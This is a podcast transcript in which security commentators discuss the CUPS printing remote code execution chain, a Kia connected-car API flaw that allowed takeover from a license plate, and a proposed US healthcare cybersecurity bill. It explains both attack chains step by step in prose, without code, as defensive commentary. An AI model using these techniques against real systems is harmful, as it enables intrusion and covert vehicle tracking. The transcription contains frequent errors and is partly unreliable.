This week on the podcast, we cover the "9.9/10 severity vulnerability affecting most Linux systems" that a researcher disclosed last week and what it means for Linux systems administrators. We then discuss a research post into Kia's remote control systems that allowed one researcher to compromise any Kia in the last decade by just knowing their license plate number. We end with a new act that was just introduced into the US Senate with a goal to secure the healthcare industry.
View Transcript
Marc Laliberte 0:00
Hey everyone, welcome back to the 443 security simplified. I'm your host, Marc Laliberte, and joining me today is
Corey Nachreiner 0:07
Corey drain the cups, Nachreiner. See that
Marc Laliberte 0:11
one good one too. On today's episode, we will be discussing the remote code execution vulnerability in a cups utility. After that, we'll go over a attack or hack or vulnerability series of issues it could have compromised every key I made in the last decade, and then we will end with a proposed set of legislation from the United States Senate that could actually have a meaningful impact on health care security. With that, let's go ahead and, I don't know, pour our cup. Oh, wow, that was not good at all. I don't know, drink our cup. Drinking. Pour it away in let's
Corey Nachreiner 0:52
just clean up this filled cup.
Marc Laliberte 0:56
How do you verb that? I don't know if you can. I give up. Let's just roll. So
let's start today with what I thought was going to be one of the biggest like vulnerability stories that we've talked about this year, when it was kind of first announced earlier in the day, where it came out on Thursday, a software developer called Simone margaretelli. I probably butchered that, but I'm sorry for him or her. Them, I don't know. I think it's a him. I saw a picture of him taking a picture them. Is always safe. Yes, there we go, them. So they said that they were going to disclose a 9.9 out of 10 remote code execution vulnerability that might impact every single Linux system. So this was like a holy crap like skepticism to start with, as there always is for this. But if it was actually that serious, this would be a pretty insane flaw that caused a lot of issues globally. Well, later that day, they posted a meme filled write up, which was not my cup of tea, but I understand that's the writing style for some folks on a series of vulnerabilities that they discovered in cups, which is the Linux printing service. And they disclosed all this despite there not actually being a patch available after they got frustrated with some of the handling for these vulnerability reports by cups developers and even others in the space as they were trying to work with them. So the vulnerability it specifically impacts a library called cups dash browsed, which is a utility for discovering new printers and automatically adding them to the Linux based system. They found that on so this all started on their Ubuntu system when during a brand new setup, they did a like out of curiosity check to see what services were just listening wide open on the system, and found something was listening on UDP port 631 they knew TCP 631 was for Internet printer communications. The UDP was a little interesting, and just listening by default on all addresses that 0.0, dot 0.0, was abnormal, so they decided to start looking into it.
Corey Nachreiner 3:20
Yeah, that's not even local host. That's like everything, yep.
Marc Laliberte 3:25
So they found that this utility would accept connections on it, and if they were formatted correctly and containing a URL, it would then use the Internet Printing Protocol, or IPP, to request printer attributes from that URL in the request. So basically, someone could send a packet, a UDP packet, to this Listening service. The cups browsed library, would then reach out to a URL in that packet and go download attributes for a printer that was hosted there. Then this utility is responsible for saving those attributes into a file using a very specific, like line oriented syntax for printer configurations. And unfortunately, it uses F printf, with some string formatting in there, without any escaping of the user supplied screen string, meaning an attacker that can control what is put in here, presumably by owning that remote server that the system is reaching out to can inject whatever they want into that string that gets written to the file, the file itself. It's called a PPD file, a postscript printer description, and it's basically like a definition file for a printer on a Linux system, and it includes information like what types of files types that printer supports, how to handle file types that it doesn't support, like using filters and things like that. And it's basically what Linux References. When it goes to start a print job with that remote printer. So an available attribute in there doesn't actually that. So there's a few attributes in there that are important. One of them, though, is basically a it's called a filter controller, and it basically it tells the local print service like, how to handle, let's say, a PDF. If the printer didn't know how to read and print a PDF, you could point to another executable that would then be responsible for converging that PDF into something the printer did support. So immediately his thought was, oh, well, can I point to just any arbitrary executable and have it run that when it tries to handle this type of file. But it turns out it is actually limited to only specific executables in a specific directory, user, lib cups filter, but one of those executables is a special type of generic filter called fumatic RIP. I don't know where the RIP like what that stands for fumatic. I also have no idea what that stands for. Foo generally, is the general term you would use when describing like a placeholder text value or something. So maybe the Linux developer, in this case, had a sense of humor. But with fumatic grip, you can actually configure a custom command that this filter runs by using a different PPD attribute called fumatic RIP command line within that PPD file. So like long story short this attack chain is you force the target machine to connect to a malicious IPP server by sending a packet to that exposed service pointing to your server as the print server. Then when it requests that IPP attribute, string or all the info that's going to save in that PPD file, you escape out of the formatting for the string and inject your own PPD attributes in there that otherwise shouldn't have been included, specifically pointing towards a filter and then configuring that filter with a command. And then you wait for a print job to execute that will be sent to that fake printer which ultimately executes the command. That's how you get code execution. So, like broken down, there's four vulnerabilities he went over there, CVE 2024, 471, 76 which is the cups browse the listens on inet any on port 631, by default, and issues IPP requests based off attacker controlled input. The second one is that lib cups filter specifically the attribute function in there, the attribute handling function in there doesn't validate or sanitize the returned attributes before handing them off to the actual cup system. The third is that lib PPD does not validate those attributes before writing them to the PPD file. And then the last one is that any value passed to that fumatic RIP command line via the PPD file will be executed as the user as if it was a command. And actually, that last one's interesting. It's currently being contested by a lot of vendors, because it is fundamentally what that filter is supposed to do. It's supposed to be a generic filter that you can configure with a command line to run certain things. So it's not necessarily a vulnerability on its own, but it is part of this attack chain to gain remote code execution on some Linux systems if they're configured in a specific way, meaning the attacker needs access to that listening port, so it has to be enabled by default, which Ubuntu does. Red Hat does not, for example, that port needs to be exposed to the attacker, so either straight up on the internet with a public IP address assigned to it, or, I don't know, netted behind a firewall. I think it only listens on IPv four inet, not IPv six. So even like, IPv six probably wouldn't help with that case. But basically, long story short, like, I think it's a serious, important chain of vulnerabilities, but it's one of those where it's a very specific setup that you need in order to actually be vulnerable to this type of attack.
Corey Nachreiner 9:09
And how many internet exposed print like, I get that if you have this running on internal Linux computer internally, you're going to be exposing that port. But how many are really going to through their firewall and added network expose it to the internet. So some do, I believe right there you we could probably do a showdown search less common. So
Marc Laliberte 9:33
it seems like the Linux flavor that is, at least by default, vulnerable is some versions of Ubuntu, and so that is also probably the most popular cloud based Linux distribution, maybe behind amazon Linux, but it's a very popular one to deploy in a cloud environment. But I don't know is the like configured services? Are they different on a like Cloud version or release of Ubuntu versus the local one? Because. Yes, could imagine a scenario where someone goes to AWS, they spin up their own EC two server, that server, by default, if they choose to, has an IPv Forward address attached to it, and if they don't have the right security rules in place, then in theory that could expose that machine to this vulnerability. But again, that is like a list of mistakes or errors that would have to be made before it's actually exploitable. It's a bit of a far cry from every Linux machine under the sun is affected by this in their default config state. That's not the case for this one,
Corey Nachreiner 10:36
by the way. I think you alluded to it, but you're diplomatically not going into the drama that this meme poster type of dude is doing. But what are your thoughts like he, at the end of his whole thing, he talks about personal considerations, and it sounds like in his point of view, you know, the actual cups maintainers were pretty condescending and took a while to be, you know, concerned with or react to this particular attack. It sounds like
Marc Laliberte 11:05
I, uh, I try not to be judgmental with people that I don't know and that I've never interacted with, and my only, only interaction with this person is the blog post they wrote. But I sometimes you can generally understand someone's mode of communicating and mannerisms of communicating based off of what they write and based off of the post that they wrote and how they described that dramatic situation. My guess is maybe they are, I don't know, maybe they were a little tough to work with.
Corey Nachreiner 11:39
Yeah, I think there's two sides to a story, and while we probably appreciate responsible disclosures and researchers and we I do understand that maybe vendors can be slow or bad to respond, especially in the past. I think sometimes researchers can come to things with a bad attitude that will result in the, you know, the vendor not really appreciating that too. So it's hard to say it is interesting. I did know you wanted to talk about you mentioned, it's not exactly a nine, nine CVS, and it sounds like that was something the community or people accused him of overrating this vulnerability to.
Marc Laliberte 12:21
Yeah. So he originally, or maybe not originally, but at some point, engaged cert in their Vince program, which is that, what is it? Cyber, signed up for emergency response, whatever something platform, basically a way to coordinate a disclosure and response with multiple vendors that might be impacted. So in this case, like presumably, every Linux vendor out there would have been notified through this at WatchGuard, we get notifications for things affecting, let's say, implementations commonly used on like network security appliances, where they'll reach out to WatchGuard, Fortinet, Sophos, checkpoint, Cisco, all of us through that platform. So it's a way to coordinate and what should be a controlled environment, letting multiple vendors know about a vulnerability through like an embargo that should protect the knowledge of the vulnerability, and meaning
Corey Nachreiner 13:13
all the people that are on Vince should have signed something saying that they shouldn't leak any early information to outside location. But
Marc Laliberte 13:21
funny enough, as the researcher pointed out on their blog post, someone in the like the community that was notified about this one on Vince did leak that info. There was a post on hack forums, or breach forums. People watched the
Corey Nachreiner 13:36
video. I've turned it off now, but we I dwelled on the hack forum post for a second for you to see.
Marc Laliberte 13:42
Yeah, so clearly, someone that has access as a vendor decided to publish this on breach forums, or, I mean, whatever
Corey Nachreiner 13:49
the code's name is. Now it's been pulled down and up so many times internally,
Marc Laliberte 13:54
whenever we get one of these embargoed issues, we put a lot of protections in place to protect the contents of it, like the vulnerability details are strictly need to know only the developers that are working on it have visibility into it. But I could imagine a scenario with another company, maybe where they just open a ticket and their ticketing system that anyone in the company has visibility into, and then one of their employees, like, not even, like, some random person from support, maybe goes and leaks it. So I could see a scenario where that happens, but either way, like, I think at the end of the day, this is if you're in a vulnerable configuration, which could be Ubuntu desktop on its default setup, and potentially other flavors of Linux. This is an important issue, like it is a network accessible chain that can give you remote goad execution. But this is not the world ending vulnerability that I think the researcher really promised early on in that day. So long story short, if you don't need cups, brows, D. Go remove it, make sure it's not listening on port 631, by default, and maybe make a habit of hardening your systems, just in general, and removing services, and especially listening services that are not needed on that system. Agreed. Corey, that sounds like great advice. Thank you.
Corey Nachreiner 15:17
I think so. I don't even have to add to it.
Marc Laliberte 15:22
I guess, before we pivot off this though, like, let's What is your what are your thoughts? Corey on, we hot take time. It seems like we're in a period where vulnerabilities are being over promised or overhyped more and more frequently. Like, I know every year, there is always one that is kind of serious, like Heartbleed or things like that. But it seems like lately everyone is trying to, like, make a name for themselves with vulnerabilities and, like, get fancy marketing names, hype it up as the, you know, this is world ending for Linux kind of thing. But it just turns out to be, oh well, with a crapload of asterisks on the end of it, it might be, yeah,
Corey Nachreiner 16:04
I'm with, I like, I think it all is like, to be fair, one of the best ways to get noticed in the information security community is by, like, doing something that gets seen by many and contributes to helping secure folks. So finding, like, a huge zero day somewhere, and, you know, even outside of bug bounty programs, where you're not just trying to get paid for it, but you're disclosing it to everyone. It's, it's how a lot of researchers that I follow started their careers. So I get it, but, yeah, I'm, I'm, I don't think security should be marketing, though, and I don't, the older I get, the less I care about all the drama around the memes. And he said, she said, and let's just work together to fix the issues. So, yeah, this one does seem overhyped. At least this one, I doesn't really have a marketing name, though, does it? But it everything this. I mean, this guy starts with a it looks it's in quoted format, but I don't know who quoted it, but the first thing in the advisory is a quote that says, from a generic security point of view, the whole Linux system as it is nowadays is just a endless and hopeless mess of security holes waiting to be exploited. And that alone seems like a super freaking strong statement. And is that what he thinks? Or who's that quote from? Because it shows us a quote on this blog. So on one hand, if it's true, we should talk about it. But I don't know. Sometimes I think we get way too into our own little soapbox issue that may not be as bad to the real world as we think it is.
Marc Laliberte 17:44
I feel like they really missed an opportunity with marketing this one too, like cups overflowing, or cups, yeah,
Corey Nachreiner 17:50
would be oh gosh, you're right. There's so many technical related cups marketing names you could do. I did. The one thing I do think is important, though, is showing how change vulnerabilities that may not be particularly risky on their own can lead to really bad things. So I do always think it's good to point out that these chains can turn into pretty severe things. But you're right. There's many asterisks, yeah. And do you just you shouldn't be opening up ports randomly that are sitting on your servers, so hopefully, just a normal firewall is preventing this from getting past your internal network.
Marc Laliberte 18:32
Agreed, and even like the built in, like Linux, firewalls, by default, should restrict public access to some of these exposed services, like the host based ones if you're using them, but could be an important issue, way less important than we were led to believe several hours before it was published. So moving on, this second story was a pretty fun research post from a researcher that I've actually been following for a while. His name's Sam curry, if you haven't read his research, there was a post last June that I think I had queued up to talk about on the podcast, but it didn't make the cut on vulnerabilities and ongoing attacks he found against his cable modem back then. It was really interesting research posts you can check out Sam curry.net to go see that too. But he just published a new one just last week, and this one describes a set of vulnerabilities in basically all Kia vehicles after 2013 they could allow an attacker to remotely control any vehicle by only knowing the license plate of that vehicle. So they started their journey by [email protected] the website and the iOS app that Kia owners have for managing their vehicles, because both of them can ultimately execute internet to vehicle commands such as starting, stopping, unlocking, locking, honking the horn, things like that. So. So both of these proxy their web requests or the API requests through a let's call it the user API. In this case, the user API works in basically two stages, as a the application or the website wants to do something. The first thing it does is it sends an authentication request to that API for a specific URL, like, let's say, door unlock with the user session ID, and then it gets back a separate session ID and the vehicle, like Vin UU ID basically a locator for the car itself that they can then use to call the actual API. So they would do, for example, let's say, like, authorize a unlock command using this to this car, and then it would send back. Okay. You can use the unlock command using this session ID and this Vin key in order to do it. So after understanding that basic API, they then turn to look at the key Kia dealership infrastructure, which is responsible for provisioning the initial access to this API too. So they found that the dealership website also uses the exact same API as the customer apps, just different endpoints. So instead of like customer.kia.com it's Kia connect dot k, dealer.com but the API like endpoints are fundamentally similar, or almost identical. They got a copy of a like invite email for a brand new Kia owner to go set up their account and gain access to all the commands through their vehicle, so they're able to use that to do some poking around within this API. And then they found also by poking around through this API, several employee only endpoints for things like vehicle or account lookups, enrollment and unenrollment for users, things like that. So they first started by focusing on the access token that they had from that like welcome email, and they tried to see, could I use this access token to use the employee API endpoints? They could not. So you needed to actually be a Kia employee in order to use those ones, which is good. But then there's this quote from their their blog post. They said, We thought back to the original owners.kia.com, website, so the customer one, and then wondered, What if there was just a way to register as a dealer, generate an access token and then use that access token here for the employee once instead? So they actually found that the, let's say the dealership API endpoint still had a register user endpoint, just like the consumer endpoint. And so they were able to call this, register their own account on the dealership API, because it was exposed, and then log into the dealership API using that which got them a valid dealer privilege access token. And then from that, then they could access any of the dealership API calls, including ones, to add additional users as owners for any given Vin vehicle identification number. So, long story short, the attack path, which they show a little bit lower in their post, is they generate a dealer token that then fetch the victim's phone number and email and Vin from the let's call it the registration database. They then remove the owner via that email and phone number from owning their own car. They add the attacker as the primary owner instead, and then they can execute any commands to that Vin and so by just having the VIN number. In this case, they can go in and take over a car. But they took it one step further. They found a third party API that can turn license plates into vehicle identification numbers, and they built this entire web app where now you can take a license plate number and a state, plug it into the app, it will go, take over that car effectively, and then give you a little dashboard for running different commands like locking or unlocking the doors, getting the GPS location, honking the horn or starting, starting or stopping the engine. And they finally tested this with a rental car that they got from a rental agency to prove it worked. Reported it to Kia in June, and it was just confirmed as resolved as of just this last week.
Corey Nachreiner 24:26
This demo of using that web tool they made to with just a cell phone to actually gain control of a Kia in a parking lot. So cool example of what they can do with it. It's
Marc Laliberte 24:41
pretty like this issue. So the root cause, if I had to list it for this, was it looks like Kia used basically the same like API schema, let's say, for the user API and the dealership API. Probably to save development time, it makes sense to reuse where you can but they. Left what should have been protected API endpoints like registering and even like authenticating, exposed so that even if they're not advertised anywhere or included in any actual app, they're still valid endpoints, and so someone can guess and use them in order to create their own account with these elevated privileges. Then,
Corey Nachreiner 25:21
by the way, did they have to demote the user to add another primary one, or did they have to remove the user to add a primary one? Because I feel like removing a user is a good like, if you're espionage and you want to have control of someone's car, but you don't want them to know, because maybe you're using GPS to track them or whatnot, you would want them to still be able to use their keys and the app to do their stuff. So I was just bring it to be low primary, but still leave the user as capable. I
Marc Laliberte 25:54
genuinely have no idea how Kia works, so I don't know the way they worded it. It sounded like they were taking over as the primary but maybe the user would still have access. But, yeah, I'm not sure. Hey, I'd
Corey Nachreiner 26:06
hope so. I mean, from an attacker perspective, the good news, if they had to literally demote the user from using the car, at least you would know this happened to you. It'd be even worse if it had happened to you, but you still didn't realize other people had access to the car you were driving around and using, yep,
Marc Laliberte 26:24
but, uh, let's look, Remember last week when we were chatting about, you know, some of the risks of, let's say, intentionally insecure systems from like China based cars this example, I've obviously this wasn't intentional. There's no way Kia meant for like this to be a vulnerability. That would be insane. But you can picture like if a hostile nation state had discovered this, like, let's say three, four years from now, when like, international relations are deteriorating, deteriorating even more, and they decide to say, let's go, you know, screw with every single Kia owner from the last decade in the United States, and effectively brick their cars by locking them and turning them off where they are. That would cause a considerable amount of like, like, I don't know. It obviously wouldn't disrupt the us a whole lot, but it would be like, What the heck is going on? But
Corey Nachreiner 27:16
I'm thinking even from an espionage standpoint, if they could target like, if they have their typical journalist and political targets, and not all of them will own Kias, obviously, but if a subset does, and they have this, they could maybe not even do the disrupt that user's travel, but just be part of the primary user in the car and follow them on GPS, use that information to mess with them, And yeah, it certainly could be a very dangerous vulnerability. I think this is to car hacks are a huge deal ever since. Was it Chris velascek And was it Charlie Miller? Charlie the Jeep ones? So, yeah, it's interesting to see them get even easier and a people forget that your car literally has a sim chip and is always online nowadays.
Marc Laliberte 28:04
And it's like, it's still really interesting that you know things that can control a car and impact a car like this, the fundamentally can be broken by just basic web app flaws. Now,
Corey Nachreiner 28:16
I know, yeah,
Marc Laliberte 28:19
it's not like you don't need to be within like, signal range or plugged into the actual like, ODP port, or OD whatever the heck on board diagnostic port, like this one is it's a web app flaw, just on an API. And that's enough. And
Corey Nachreiner 28:32
there's sim Matt, there's there's sim and sister, the Kia system connects all the cars to that web app for provisioning, apparently. So, yeah, totally weird, crazy, a flaw in that system. Maybe they should find different ways to tie people to the cars
Marc Laliberte 28:50
I don't even know. Like, how do you fundamentally fix this type of issue, like, prevent this type of issue? Like, meaningfully because users, like, clearly, there's an appetite to have connected apps that control your car for, like, starting it out in the street when it's cold outside, or unlocking it when you're walking up with your grocery bags, things like that. Like, there's clearly an appetite there, but there's a decent amount of risk, because these are, like, 1000 pound killing machines, and if one shuts down randomly on a highway, that could be pretty damn big deal. Yeah, so I don't have a solution for this. It's just it feels like I don't know can do better, and there's
Corey Nachreiner 29:27
an appetite for all these features, and they are tiny little conveniences. But you got to ask, is the convenience worth the risk? I lived my life pretty well with cars, figuring out how to open the trunk with one hand while holding groceries before, you know, so I'm not denying that I'm just as lazy and happy for all these connected features as everyone else, but I think the question is, is it really worth it? I mean, I don't use like I think the novelty would have me in a car app opening my trunk before. Went outside for the first week, but after that, I a lot of these features. Are they really the most used features that are critical to people? Maybe they are too risky to decide to introduce the car to potentially Internet facing vulnerabilities for Yeah,
Marc Laliberte 30:18
I don't know, but Kia did fix this one, I assume, by removing that registration API and then just continuing on their day. But it has, maybe securing
Corey Nachreiner 30:26
it in a different way. Who knows? It has it took a bit resolved? Yeah.
Marc Laliberte 30:34
So moving on. Then for the last story, just this last week, Senators Wyden of Oregon and Warner of Virginia introduced a new bill into Congress that would force cybersecurity improvements in the healthcare industry. In their little press release for it, they pointed to like the change healthcare incident with United Healthcare and other previous ransomware incidents that severely disrupted large portions of the healthcare industry, and clearly something has to change, was the basic takeaway from it. But they introduced what they're calling the health infrastructure, security and Accountability Act, which, I guess, is Hissa instead of HIPAA, which does quite a few different things. It's not, it doesn't have like, you know, mandatory, well documented requirements, like you must follow NIST, whatever. But it lays out some interesting things that I think could have a meaningful impact on the industry. So let's go through them. So first, it updates HIPAA to include mandatory minimum cybersecurity standards for healthcare providers, healthcare plans and other like similar entities. Part of that, it requires regular, documented risk assessments. It also requires a documented business continuity and disaster recovery plan as well. For these which there that on its own is pretty important, because, like, the big issue from like that change healthcare incident wasn't that they had ransomware, it's that they were, like, completely incapable, not ready to restore Exactly. They could not function without those healthcare information systems, same with, like most hospitals, like when they get nailed with ransomware, like, what was it? Ascension recently, they slow to a they fall to their knees and they can't continue to function anywhere as much as they used to. Like the resiliency is not there in the healthcare industry,
Corey Nachreiner 32:28
by the way, though, this is a funny thing to me, just as you know, we started our careers as security experts that had the benefit of talking about all the good practices, but not necessarily having to execute them beyond our small, little domains, but, but now we actually are the people that run security for our company, like those two things of saying you you have to document your business continuity plan, and you have to document like, what was the First one incident risk assessment, like I, some people hate when I use this term, 101, but like, as a CI, like, these are all 101, things you know, have a policy for everything. And business continuity and disaster recovery is just a basic part in probably a full domain. And CISSP, so it's, it's amazing to me, still with the focus cyber security is getting that I think many, many mature as far as timeline and how long they've been in business organizations, apparently don't have it so and like a everyone gets irritated with regulation. If it's some seems like, you know, someone's dictating onerous things that slow down business, but it really seems to be like you're not even doing the 101, thing of thinking a little bit about, if things went down, how would you recover, and trying to write down a plan for that.
Marc Laliberte 33:59
And let's remember, like, I'm not saying that it was better back then, but there was a time relatively recently, when much of healthcare was run on pen and paper, and obviously, like bringing in computers does make it more efficient, probably less error prone as well, too. Like, there's, there's a reason that we use a lot of technology, but the fact that we can just totally derail an entire hospital by taking down and not really having a robust fallback of any sort, is pretty dangerous for like, what type of institution it is. So that's requirement number one for this. The second one is so it requires covered entities to submit annual independent security audits and to actually run stress tests to show that they are capable of restoring services promptly after an incident, and also the stress tests need to prove that they can continue providing essential care during and in the recovery period of so. Interruption. So basically, that's what we're getting at. Is like now they also need to prove they're testing it. They're doing a tabletop exercise of some sort, or even, like, I don't know, but it
Corey Nachreiner 35:10
sounds like a technical test with the stress test is actual technical exercise, it seems like.
Marc Laliberte 35:16
So I liked this one because, like, it's also it's easy to put a BCDR plan on paper and be like, okay, yep, we're good, but actually proving that it works in the real world? Exactly so force.
Corey Nachreiner 35:32
I admit this part is harder, though. I we support it because we are starting to do tabletops too, but in your everyday life, when you already have departments and your your own security team doing so much, I guess I can see how it is hard to get to this. Let's actually test our thing. But I think for business continuity, you know, basically cyber resiliency, it's a must, because if you don't do a tabletop test, the truth is, I think the reason people forget to really put much effort in BCDR, is it's that that thing that doesn't happen 99.9% of the time. So it's it's easy to skip, because you might get away with it for a long, long time, but the second something happens, you not having it's a big deal. But if you only relied the fact that it's so irregular or so uncommon to have an issue, like anytime you create a plan or a policy, you know, it's not going to be perfect, you know, it's going to have to change and evolve, depending on if it works or not. So if you don't have the actual tabletops and stress testing, you won't get enough feedback to continuously evolve this plan. So I think the tabletops are very important that I'm less surprised that people do because it is just harder to find the time, but it still surprises me that many of them don't even have a documented plan at all.
Marc Laliberte 36:53
So the third item was requiring the Health and Human Services Department to proactively audit the data security practices of at least 20 entities every single year. So now the government's going to come down and run an audit and make sure that proactively, you are following all these before something happens. Now, 20 doesn't sound like a lot, but when you consider like major hospital chains, the big ones, that would probably be first, like auditing, let's say Group Health, or it's not Group Health anymore. What the heck is it called? The other one up in Oregon and California, in the mall, anyways, auditing, like one single hospital chain, can get you a large portion of the United States, and so 20 a year will cover a decent amount of at least the major ones too. So I think that's good. The one that was really interesting. So they actually take a bit from the sabbane Oxley Zack from financial reporting, where, if you're a publicly traded company, your chief executive officer and your chief financial officer have to, like, attest to the federal government that your compliance and everything is like correct, that you are meeting all the requirements for the Sarbanes oxleys Act. So they're going to add something like that to here, where it will require executives to annually certify their compliance with the requirements, and they point out that it is a felony to lie to the federal government, and they'll impose a million, up to million dollar fine and up to 10 years in prison for knowingly submitting a report with false information. So holding executives accountable like this
Corey Nachreiner 38:32
is more, more stress free. CISOs all over the world, I mean, but no, I agree. I mean, if we, if the community is really that negligent, some of the basics, maybe it does have to come down to this. Yeah, I hope, I hope the knowingly has a lot of like I, I could, I would never personally try to lie about anything on a when I'm saying we meet this certification. But at the executive level, every single detail. Knowing that it's right in the audit, it's sometimes hard to know, but I think this is giving it good teeth to make sure people do it. There will be, you know, liability and accountability.
Marc Laliberte 39:13
Next up is it's going to eliminate the statutory caps on the Health and Human Services fining authority to make basically meaningful fines against the largest authorities count like right now, let's say the cap. I don't know what it is, but let's say it's like $5 million or something. If you go after, you know, ascension with a fine for negligence, and it's $5 million but their revenue is like 5 billion. It's
Corey Nachreiner 39:34
a care, yeah, then it can become, actually, like a good stick to beat them with, if that's kind of like GDPR, right, where they have two types of fine, you know, it's either this amount of money or a specific percentage of your company's income. Because they know bigger companies may not care about the littler fines, but a percentage of their income is the same, even if they. Have a ton of revenue, yep,
Marc Laliberte 40:02
to pay for all of this and the new like regulatory authority that the HHS is going to have, they're going to require a user fee on all regulated industries or entities, which basically means, like hospital bills will go up slightly to pay for this. For people, my cynical take is, if a hospital already cheap 10,000 to $10,000.05 to cover this, does it
Corey Nachreiner 40:25
really matter? As long as they don't charge hospital prices, like in a hospital, you pay $10 for an aspirin, so I hope it only does come up. Should be five cents more, because the government is charging a actual, you know, real price for the service. Yep, not a made up, hugely inflated one. And then it sounds like, what I like about it is things I think you're about to get to now is there is some incentive?
Marc Laliberte 40:53
Yeah, because it would be easy to write all this and say you must now adhere to this. And here's all the rules, good luck. But they recognize also that there's a reason. Like hospitals are this way, especially like smaller ones, think of like rural ones that are in areas that there's just not any money there, even if they wanted to make a tidy profit there. And so part of this is providing $800 million in investment payments to rural and urban safety net hospitals and $500 million to all hospitals to adopt these enhanced security standards. So million and a half bucks or so just shy, I wonder which
Corey Nachreiner 41:31
funds that are the hospitals technically paying for that incentive, because being part of the, you know, having to register and pay that payment, which they're going to, of course, give to customers, the patients. Are we paying for that incentive too?
Marc Laliberte 41:46
I am also a little annoyed that, like so I 1,000% support this for, like, the rural and like urban safety net ones, the ones where, like, it may be the only hospital in a 300 mile radius, and even then, they're still broke. I hope that these payments don't go to the places like Kaiser and like Ascension and St John's, like those types of ones, Baylor's, where, you know, they're raking in a ton of money they can pay for their own dang cyber security. So I really hope that there's some guard rails
Corey Nachreiner 42:17
they just, I agree. Yeah, I don't want another system for hospitals to take subsidy like incentives from if they're already super rich.
Marc Laliberte 42:25
And then the final one was actually directly in response to that change healthcare attack, where it was actually the secretary of the Health and Human Services Department had to, I don't want to say extrajudiciously, like they went out of their way in a way that technically they weren't allowed to, I guess, in providing accelerated Medicare payments because of all that disruption. And so this codifies the Secretary's authority to provide advanced and accelerated Medicare payments in the event of a cybersecurity disruption which was necessary during that change healthcare attack. So getting that in writing so that our good friends at the Supreme Court, like blowing things up, can't blow up that sometime in the future again, too. But either way, like on the face of it, the bill is actually pretty short. I'm used to like skimming through or reading through page even, well, a page and a half for the summary, but and even the text itself was only like 50 pages, and most of it's kind of the intro and outro bits. So what I'm getting at is it's not a as in depth as, like other bills I've read are, where it lays out these specific requirements on you know, you need MFA. You need to follow NIST, 853 all the controls and things like that. It's basically just starting high level with, okay, you need some cybersecurity standards. I guess they'll probably lean on NIST or someone to come up with those. You need documented risk analysis and a BCDR plan, and you need to test it. And that's basically it. And if you lie to us about, yeah, we're doing these things, then we throw your executives in prison. That's basically all this law is there. Now, the cynic in me says that this probably won't pass, and that's strictly because it was only introduced by two Democrats, and generally you need at least one like Republican sponsored to have any semblance of, like, chance of there being some bipartisan cooperation. So the fact that there wasn't any
Corey Nachreiner 44:30
hard to imagine how this would be partisan, other than, I guess one party is just generally anti regulation and anything that hurts businesses profit. Yeah, I'm hoping you're probably right. Yeah, you both can hope it is interesting to see more and more law in bills come from whether they pass or not, that are cybersecurity related, between White House's strategy other nation state strategy, there's lots of legal focus. Government focus on trying to get a handle around the problem, hopefully we will be able to pass things that help protect everyone. But no, you're not wrong. I'm skeptical that Congress can pass much, other than half hearted attempts to maybe keep the government open for 9490 more days, over and over again, while they argue about what parts of the government should exist.
Marc Laliberte 45:24
Yeah, because, yeah because, fundamentally, like, healthcare is a critical infrastructure, like and it is one of the more critical infrastructures, and that if it, if we have a major disruption, like a widespread disruption to healthcare, that's pretty catastrophic to our population and citizens in this country, and so I this is one area where I am a little more comfortable with, like, leading with a bit of teeth, and not just incentives, but also the we're going to throw your executives in prison if you screw this up kind of way, like if we can do That for financial institutions and lying about financial records, we sure as heck should be able to do it for cybersecurity requirements for healthcare. I feel like that's, you know, orders of magnitude more acceptable, but whatever we'll see. Fingers crossed, I could be proven wrong. Could just be, because I think they're the two, like heads of their little committees that maybe that's the reason they were on it, but I guess we will wait and see if anything comes of this bill and gives any meaningful improvements to cybersecurity and healthcare. Hey everyone, thanks again for listening. As always, if you enjoyed this episode, don't forget to rate review and subscribe. If you have any questions on today's topics or suggestions for future episode topics, you can reach out to us on Instagram. We're at WatchGuard. Underscore technologies, thanks again for listening, and you will hear from us next week.